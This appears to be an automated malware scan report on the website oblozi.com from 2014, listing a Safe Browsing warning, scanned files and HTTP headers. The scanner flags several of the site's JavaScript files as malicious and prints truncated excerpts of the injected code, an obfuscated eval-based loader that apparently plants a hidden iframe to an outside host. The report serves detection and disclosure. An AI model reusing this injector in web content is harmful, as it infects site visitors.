Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=oblozi.com
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Result: The website is marked by Google as suspicious. - visiting this web site may harm your computer.
Details are available here.
Scanned pages/files
Request | Server response | Status |
http://oblozi.com/ | 200 OK Content-Length: 15279 Content-Type: text/html | clean |
http://oblozi.com/oblozi.js | 200 OK Content-Length: 25524 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]--}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_7a_6e_7f_68_6c_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_7a_6e_7f_68_6c_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_7b_6c_73_71_7c_6d_76_6d_35_7c_7a_36_6a_76_7c_75_7b_39_39_35_77_6f_77_2e_42_14_11_27_7a_6e_7f_68_6c_35_7a_7b_80_73 Antivirus reports:
| ||
http://oblozi.com/calendar.js | 200 OK Content-Length: 59659 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]--}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_7a_6e_7f_68_6c_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_7a_6e_7f_68_6c_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_7b_6c_73_71_7c_6d_76_6d_35_7c_7a_36_6a_76_7c_75_7b_39_39_35_77_6f_77_2e_42_14_11_27_7a_6e_7f_68_6c_35_7a_7b_80_73 Antivirus reports:
| ||
http://oblozi.com/scriptaculous-js-1.8.1/lib/prototype.js | 200 OK Content-Length: 136625 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) e=eval;v="0"+"x";a=0;z="y";try{a*=2}catch(q){a=1}if(!a){try{document["\x62od"+z]--}catch(q){a2="_";sa=7;}z="27_6d_7c_75_6a_7b_70_76_75_27_81_81_81_6d_6d_6d_2f_30_27_82_14_11_27_7d_68_79_27_7a_6e_7f_68_6c_27_44_27_6b_76_6a_7c_74_6c_75_7b_35_6a_79_6c_68_7b_6c_4c_73_6c_74_6c_75_7b_2f_2e_70_6d_79_68_74_6c_2e_30_42_14_11_14_11_27_7a_6e_7f_68_6c_35_7a_79_6a_27_44_27_2e_6f_7b_7b_77_41_36_36_7b_6c_73_71_7c_6d_76_6d_35_7c_7a_36_6a_76_7c_75_7b_39_39_35_77_6f_77_2e_42_14_11_27_7a_6e_7f_68_6c_35_7a_7b_80_73 Antivirus reports:
| ||
http://oblozi.com/scriptaculous-js-1.8.1/src/scriptaculous.js | 200 OK Content-Length: 15113 Content-Type: application/x-javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var Scriptaculous = { Version: '1.8.1', require: function(libraryName) { document.write('<script type="text/javascript" src="'+libraryName+'"><\/script>'); }, REQUIRED_PROTOTYPE: '1.6.0', load: function() { function convertVersionString(versionString){ var r = versionString.split('.'); return parseInt(r[0])*100000 + parseInt(r[1])*1000 + parseInt(r[2]); } if((typeof Prototype=='undefined') || /*/81a338*/ Antivirus reports:
| ||
http://oblozi.com/index.php | 200 OK Content-Length: 15279 Content-Type: text/html | clean |
http://oblozi.com/?log | 200 OK Content-Length: 16369 Content-Type: text/html | clean |
http://oblozi.com/?reg | 200 OK Content-Length: 17255 Content-Type: text/html | clean |
http://oblozi.com/rss/ | 200 OK Content-Length: 6485 Content-Type: application/rss+xml | clean |
http://oblozi.com/test404page.js | 404 Not Found Content-Length: 0 Content-Type: text/html | clean |
http://oblozi.com/index.php?gid=all | 200 OK Content-Length: 15279 Content-Type: text/html | clean |
http://oblozi.com/index.php?gid=12 | 200 OK Content-Length: 15290 Content-Type: text/html | clean |
http://oblozi.com/index.php?gid=5 | 200 OK Content-Length: 15285 Content-Type: text/html | clean |
http://oblozi.com/index.php?gid=2 | 200 OK Content-Length: 15285 Content-Type: text/html | clean |
http://oblozi.com/index.php?gid=7 | 200 OK Content-Length: 15285 Content-Type: text/html | clean |
Malicious Redirects
First query (normal visit):
GET / HTTP/1.1
Host: oblozi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 05:31:26 GMT
Pragma: no-cache
Server: Apache/1.3.41 (Unix) PHP/4.4.8 mod_ssl/2.8.31 OpenSSL/0.9.8g
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=67dddd45bd696118ae90fb46e5837486; path=/
X-Powered-By: PHP/4.4.8
GET / HTTP/1.1
Host: oblozi.com
Result:
HTTP/1.1 200 OK
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Connection: close
Date: Wed, 10 Sep 2014 05:31:26 GMT
Pragma: no-cache
Server: Apache/1.3.41 (Unix) PHP/4.4.8 mod_ssl/2.8.31 OpenSSL/0.9.8g
Content-Type: text/html
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Set-Cookie: PHPSESSID=67dddd45bd696118ae90fb46e5837486; path=/
X-Powered-By: PHP/4.4.8
Second query (visit from search engine):
GET / HTTP/1.1
Host: oblozi.com
Referer: http://www.google.com/search?q=oblozi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.
GET / HTTP/1.1
Host: oblozi.com
Referer: http://www.google.com/search?q=oblozi.com
Result:
The result is similar to the first query. There are no suspicious redirects found.